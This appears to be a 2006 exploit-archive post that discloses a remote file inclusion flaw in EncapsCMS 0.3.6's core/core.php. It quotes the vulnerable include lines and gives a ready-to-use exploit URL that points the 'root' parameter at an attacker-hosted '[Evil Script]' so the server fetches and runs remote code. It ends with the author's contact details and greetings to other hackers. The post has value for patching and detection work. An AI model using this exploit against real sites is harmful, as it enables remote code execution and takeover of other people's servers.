EncapsCMS 0.3.6 (core/core.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EncapsCMS 0.3.6 (core/core.php) Remote File Include Vulnerability
# Published : 2006-11-10
# Author : Firewall
# Previous Title : phpwcms <= 1.2.6 (Cookie: wcs_user_lang) Local File Include Exploit
# Next Title : BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability

########################### Firewall ###########################
encapscms 0.3.6  - Remote File Include by Firewall
BuG FounD by Firewall

# Application Affect:
encapscms 0.3.6

# Sorce Code:            
http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip

# Code:
         include_once($root."core/Config.php");
         include_once($root."core/DB_sql.php");
         include_once($root."core/BlogsCats.php");
         include_once($root."core/Block.php");
         include_once($root."core/Block_sub.php");
         include_once($root."core/Gallery.php");
         include_once($root."core/Pager.php");
         include_once($root."core/GalleryCategory.php");
         include_once($root."core/Misc.php");
       
# ExPloit :
http://www.site.com/encapscms_PATH/core/core.php?root=[Evil Script]

#Contact:    Firewall1954@hotmail.com 


# GrEatZ :
|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH| |Cvir.System|napster|saok|Zlevyn|Azrael|CyberAlexis| |NitroNet|Matasanos|SysRoot|ANtrAX|FaLENcE|Mnox|Xneo.System|

"El ceviche y El pisco es peruano y jamas podran igualar su calidad" - "Viva el Peru"

########################### Firewall ###########################

# www.Syue.com [2006-11-10]